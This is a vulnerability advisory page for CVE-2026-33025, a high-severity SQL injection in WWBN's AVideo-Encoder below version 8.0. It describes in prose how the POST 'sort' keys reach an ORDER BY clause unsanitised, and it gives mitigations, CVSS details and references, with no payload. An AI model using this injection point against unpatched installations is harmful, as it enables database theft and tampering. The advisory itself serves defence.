SQL Injection Vulnerability in AVideo Platform by WWBN
CVE-2026-33025

8.6HIGH

Key Information:

Vendor: Wwbn
Status: Avideo-encoder
Vendor: CVE Published:; 20 March 2026

What is CVE-2026-33025?

The AVideo video-sharing platform has a vulnerability due to improper handling of user inputs in the getSqlFromPost() method of Object.php, specifically in how it incorporates the $_POST['sort'] array keys directly as SQL column identifiers in the ORDER BY clause. While the real_escape_string() function was intended to sanitize these inputs, it only offers protection against characters in a string context, failing to secure SQL identifiers. This flaw makes the system susceptible to SQL Injection attacks. Users are encouraged to upgrade to version 8.0 or to implement alternative measures such as employing Web Application Firewall (WAF) rules to restrict POST requests with non-alphanumeric characters in the 'sort' key or enforcing access controls to sensitive endpoints by allowing only trusted IP ranges.

Affected Version(s)

AVideo-Encoder < 8.0

References

https://github.com/WWBN/AVideo-Encoder/security/advisorie...

x_refsource_CONFIRM

https://github.com/WWBN/AVideo-Encoder/commit/d1c8a17ac88...

x_refsource_MISC

CVSS V4

Score:

8.6

Severity:

HIGH

Confidentiality:

High

Integrity:

High

Availability:

None

Attack Vector:

Network

Attack Complexity:

Low

Attack Required:

None

Privileges Required:

Undefined

User Interaction:

None

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
Mar 20, 2026
Vulnerability Reserved
Mar 17, 2026

CVE-2026-33025 Data

JSON

Wwbn

What is CVE-2026-33025?

Affected Version(s)

References

CVSS V4

Timeline